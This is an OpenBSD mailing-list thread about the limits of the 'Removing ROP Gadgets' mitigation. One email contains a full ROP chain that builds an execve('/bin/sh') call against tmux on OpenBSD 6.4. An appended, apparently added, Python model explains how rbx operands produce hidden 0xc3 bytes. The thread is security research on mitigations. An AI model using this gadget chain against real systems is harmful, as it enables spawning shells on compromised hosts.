You have missed other stuff which matters.  Try again.

Nan ZoE <zoen...@gmail.com> wrote:

> Because, as far as I understand, these ROP mitigation mechanisms seem to
> have been updated only in the three versions of OpenBSD, namely 6.3 to 6.5
> <https://www.openbsd.org/65.html>. Of course, I have also studied some
> programs under OpenBSD 6.5, and many of them still seem to have the
> potential to be bypassed.
> 
> <f...@disciples.com> wrote on Fri, Sep 22, 2023 at 12:02:
> 
> > Why are you targeting 6.4? That was released in 2018. So, that's 5 years
> > and 9 releases since then and another one is happening soon.
> >
> > Sent: Thursday, September 21, 2023 at 8:50 AM
> > From: "Nan ZoE" <zoen...@gmail.com>
> > To: misc@openbsd.org
> > Subject: ROP Exploitation in openbsd-64 Programs After Removing ROP Gadgets
> > Hello,
> >
> > I have read your paper regarding the ROP mitigation mechanism (Removing ROP
> > Gadgets from OpenBSD), and I find the defense against ROP quite ingenious.
> > The paper introduces the bytecode for 'ret' as '\xc3', and its association
> > with the use of the 'rbx' register was a surprising revelation.
> > Subsequently, you adjusted the prioritization of the 'rbx' register during
> > compilation, effectively filtering out a significant number of 'ret'-ending
> > gadgets. This especially removed many misaligned 'ret'-ending gadgets, and
> > this technique has been applied to openbsd-63, 64, and 65. While the number
> > of 'ret'-ending gadgets has been significantly reduced, there are still
> > numerous 'call'-ending gadgets in the program. Security researchers can
> > still employ many 'call'-ending gadgets to carry out ROP attacks. Even in
> > programs of only a few hundred kilobytes, I have found that we can still
> > invoke the execve("/bin/sh", 0, 0) function using only the available
> > gadgets in the program, although it may require a combination of multiple
> > gadgets and some effort to achieve. I am curious if there are any further
> > ROP mitigation measures to address this issue. Additionally, I have
> > provided a ROP attack example targeting the tmux program in OpenBSD-64, as
> > shown below.
> >
> > payload = p64(0x4017ce)
> > # 0x00000000004017ce: pop r13; pop r14; pop r15; ret;
> > payload += p64(0x68732f6e69622f)+p64(0x0)+p64(0x0)+p64(0x40125d)
> > # 0x000000000040125d: pop rbp; ret;
> > payload += p64(0x4017d1)+p64(0x403dd3)
> > # 0x0000000000403dd3: xchg eax, ebp; ret;
> > payload += p64(0x412208)
> > # 0x0000000000412208: mov rcx, r13; call rax;
> > payload += b''
> > # 0x00000000004017d1: pop rsi; pop r15; ret;
> > payload += p64(0x0)+p64(0x40125d)
> > # 0x000000000040125d: pop rbp; ret;
> > payload += p64(0x40125d)+p64(0x403dd3)
> > # 0x0000000000403dd3: xchg eax, ebp; ret;
> > payload += p64(0x427a31)
> > # 0x0000000000427a31: pop rbx; pop rbp; jmp rax;
> > payload += p64(0x49e0ed)+p64(0x0)
> > # 0x000000000040125d: pop rbp; ret;
> > payload += p64(0x4017d1)+p64(0x403dd3)
> > # 0x0000000000403dd3: xchg eax, ebp; ret;
> > payload += p64(0x412053)
> > # 0x0000000000412053: mov r8, rbx; call rax;
> > payload += b''
> > # 0x00000000004017d1: pop rsi; pop r15; ret;
> > payload += p64(0x0)+p64(0x4551d9)
> > # 0x00000000004551d9: add qword ptr [r8 - 0x7d], rcx; ret;
> > payload += p64(0x4017d3)
> > # 0x00000000004017d3: pop rdi; ret;
> > payload += p64(0x49e070)+p64(0x40d571)
> > # 0x000000000040d571: pop rsi; ret;
> > payload += p64(0x0)+p64(0x4017cf)
> > # 0x00000000004017cf: pop rbp; pop r14; pop r15; ret;
> > payload += p64(0x0)+p64(0x4017d0)+p64(0x0)+p64(0x40125d)
> > # 0x000000000040125d: pop rbp; ret;
> > payload += p64(0x49e1d0)+p64(0x42d80b)
> > # 0x000000000042d80b: mov rdx, r15; mov rcx, qword ptr [rbp - 0x40]; mov rax, r14; call rax;
> > payload += b''
> > # 0x00000000004017d0: pop r14; pop r15; ret;
> > payload += p64(0x0)+p64(0x40125d)
> > # 0x000000000040125d: pop rbp; ret;
> > payload += p64(0x3b)+p64(0x403dd3)
> > # 0x0000000000403dd3: xchg eax, ebp; ret;
> > payload += p64(0x407fae)
> > # 0x0000000000407fae: syscall;
> > payload += b''
> >
> > Best regards,
> >
> > ZoE
> >
> > 2023.09.21
> >
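Added example (not from this thread and not OpenBSD's own code): a small Python model of the x86-64 register-direct ModRM encoding that shows why an instruction with rbx as its r/m operand carries a 0xc3 byte, and how counting those hidden 0xc3 bytes in a sequence with known instruction boundaries quantifies the reduction in misaligned ret-ending gadgets that the quoted paper is about. The mini-assembler knows only the handful of encodings it uses, the sample function body is constructed, and the register substitution it performs illustrates the mechanism rather than reproducing OpenBSD's actual register allocation order.

```python
# Added example: model of x86-64 register-direct ModRM encoding, used to show
# why de-prioritising rbx removes hidden 'ret' (0xc3) bytes. Constructed, not
# OpenBSD code; the mini-assembler below knows only the encodings it uses.

# 64-bit general registers in encoding order (the 3-bit reg/rm field value).
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
RET = b"\xc3"  # the one-byte 'ret' opcode the paper talks about


def modrm(reg: int, rm: int, mod: int = 3) -> int:
    """ModRM byte: mod(2) | reg(3) | rm(3). mod=3 means register-direct."""
    return (mod << 6) | (reg << 3) | rm


def register_pairs_encoding_ret():
    """Which (reg-field, rm-field) register pairs give a ModRM byte of 0xc3?
    Only reg=000 with rm=011, i.e. rax paired with rbx. (The same byte shows up
    with a REX.B prefix when rm selects r11 instead of rbx.)"""
    return [(REGS[r], REGS[m]) for r in range(8) for m in range(8)
            if modrm(r, m) == 0xC3]


def enc_rr(opcode: int, src: str, dst: str) -> bytes:
    """'OP r/m64, r64' form: REX.W, opcode, ModRM with reg=src, rm=dst.
    opcode 0x89 = mov, 0x01 = add, 0x31 = xor, 0x29 = sub."""
    return bytes([0x48, opcode, modrm(REGS.index(src), REGS.index(dst))])


def enc_imm8(ext: int, dst: str, imm: int) -> bytes:
    """'OP r/m64, imm8' via the 0x83 group-1 opcode; /ext selects the op
    (0 = add, 5 = sub). Here reg=0 is an opcode extension, not rax, so
    'add rbx, imm8' carries 0xc3 just like 'mov rbx, rax' does."""
    return bytes([0x48, 0x83, modrm(ext, REGS.index(dst)), imm & 0xFF])


def build(scratch: str):
    """A constructed function body that uses `scratch` as its accumulator.
    Returns the encoded instructions as a list, so boundaries are known here;
    a misaligned gadget search is exactly a decode that ignores them."""
    return [
        enc_rr(0x89, "rax", scratch),   # mov scratch, rax
        enc_imm8(0, scratch, 8),        # add scratch, 8
        enc_rr(0x01, scratch, "rax"),   # add rax, scratch
        enc_rr(0x31, "rax", scratch),   # xor scratch, rax
        RET,                            # the function's real return
    ]


def classify_ret_bytes(insns):
    """Split 0xc3 bytes into (intended rets, hidden rets inside other
    instructions). The hidden ones are what misaligned ret-gadgets are made of."""
    intended = hidden = 0
    for insn in insns:
        if insn == RET:
            intended += 1
        else:
            hidden += insn.count(0xC3)
    return intended, hidden


def gadget_reduction(before: str, after: str):
    """Hidden-ret counts when the compiler picks `before` vs `after` as scratch."""
    return (classify_ret_bytes(build(before))[1],
            classify_ret_bytes(build(after))[1])


if __name__ == "__main__":
    print("register pairs whose ModRM byte is 0xc3:", register_pairs_encoding_ret())
    for reg in ("rbx", "rcx"):
        body = b"".join(build(reg))
        print(f"scratch={reg}: {body.hex(' ')} -> (intended, hidden) rets =",
              classify_ret_bytes(build(reg)))
```

Running it shows the same four-instruction body encoded with rbx as the scratch register containing three hidden 0xc3 bytes (in `mov rbx, rax`, `add rbx, 8` and `xor rbx, rax`), and none once rcx is used instead; the single intended `ret` is unchanged either way. That is the whole effect of the register re-prioritisation, and it also makes the limit visible that the quoted mail raises: the count only covers 0xc3, so call-ending and jmp-ending gadgets are untouched by this measurement.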